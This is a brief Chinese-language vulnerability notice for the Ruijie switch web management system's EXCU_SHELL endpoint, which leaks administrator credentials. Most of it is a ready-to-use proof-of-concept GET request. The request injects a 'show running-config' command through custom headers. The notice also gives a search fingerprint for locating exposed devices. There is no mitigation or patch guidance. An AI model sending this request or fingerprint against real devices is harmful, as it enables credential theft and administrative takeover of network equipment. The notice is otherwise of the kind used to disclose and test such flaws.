漏洞描述
锐捷交换机WEB 管理系统 EXCU_SHELL存在密码信息泄露漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。
漏洞影响版本
锐捷交换机WEB 管理系统
body=”img/free_login_ge.gif” && body=”./img/login_bg.gif”
漏洞复现
漏洞验证poc
GET /EXCU_SHELL HTTP/1.1
Host: XX.XX.XX.XX
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Cmdnum: 1
Command1: show running-config
Confirm1: n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close